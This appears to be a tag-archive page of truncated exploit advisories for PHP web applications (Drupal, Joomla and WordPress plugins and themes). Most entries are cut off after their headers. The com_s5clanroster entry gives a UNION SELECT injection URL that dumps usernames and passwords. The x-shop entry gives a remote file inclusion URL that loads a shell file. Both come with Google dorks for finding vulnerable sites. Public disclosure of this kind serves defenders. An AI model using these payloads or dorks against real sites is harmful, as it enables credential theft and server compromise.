Tags archives: php

 

 

0

Drupal CMS 7.12 Multiple Vulnerabilities

# Exploit Title : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities # Date : 02-03-2012 # Author : Ivano Binetti (http://ivanobinetti.com) # Software link : http://ftp.drupal.org/files/projects/drupal-7.12.zip # Vendor site : http://drupal.org # Version : 7.12 (and lower) # Tested on : Debian Squeeze (6.0) # Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html # EDB-ID : 18564 (http://www.exploit-db.com/exploits/18564/) # [...]

 

0

Joomla Discussions SQL Injection

# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability # Author : Red Security TEAM # Date : 17/01/2012 # Risk : High # Software : http://extensions.joomla.org/extensions/communication/forum/13560 # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # http://server/index.php?option=com_discussions&view=thread&catid=[Correct [...]

 

0

Joomla Component com_s5clanroster Sql Injection Vulnerability

Joomla Component com_s5clanroster Sql Injection Vulnerability ==============================================================   #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Dork : inurl:”com_s5clanroster” .:. Script : http://www.newone.org/s5-clan-roster-shape5-extensions #################################################################### ===[ Exploit ]===   Sql Injection: ==============   www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]   www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null’+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users– – ####################################################################   # BB720E99B11BBA96 1337day.com [2013-05-17] B1254A136A7E866F #

 

0

Joomla x-shop

Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability   ——————————————————————————– #Author: Crackers_Child     #cont@ct: crackers_child@sibersavascilar.com   ——————————————————————————–   Google Dorks : allinurl:”/com_x-shop/”   ————————- ——————————————————-   Download : http://mamboxchange.com/frs/?group_id=187&amp;release_id=1047   ——————————————————————————– Bug in admin.x-shop.php   <? include($mosConfig_absolute_path.’/administrator/components/com_x-shop/languages/’.$mosConfig_lang.’.php’); session_start();     ——————————————————————————–   Exploit:   http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?     ——————————————————————————–   greets:   All [...]

 

0

WordPress VideoJS multiple themes vulnerabilities

  ————————- Affected products: ————————-   All versions of Covert VideoPress, Photolio, Source, Smartstart and Crius themes.     Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be read [...]

 

 

0

WordPress Newsletter 3.2.6 Cross Site Scripting

Wordpress Newsletter Plugin 3.2.6 (alert) Reflected XSS Vulnerability     Vendor: Stefano Lissa Product web page: http://wordpress.org/extend/plugins/newsletter/ Affected version: 3.2.6 and bellow   Summary: Newsletter is the perfect WordPress plugin for creating real newsletters and mail marketing system on your WordPress blog.   Desc: The plugin suffers from a XSS issue due to a failure [...]

 

0

Joomla Jnews 8.0.1 Cross Site Scripting

# Exploit Title: Joomla com_jnews Open Flash-Chart XSS # Release Date: 14/05/2013 # Author: Deepankar Arora And Rafay Baloch # Blog: http://rafayhackingarticles.net # Vendor: www.joobi.co # Versions Affected: 8.0.1(latest) and earlier # Google Dork: inurl:com_jnews   Description:   The vulnerability with Open-Flash Chart is a known vulnerability, however it is integrated with com_jnews, The get-data [...]

 

0

Drupal elFinder File Mapper 6.x / 7.x CSRF

View online: http://drupal.org/node/1972942   * Advisory ID: DRUPAL-SA-CONTRIB-2013-044 * Project: elFinder file manager [1] (third-party module) * Version: 6.x, 7.x * Date: 2013-April-17 * Security risk: Highly critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery   ——– DESCRIPTION ———————————————————   The elfinder module provides an AJAX-based file manager based on the [...]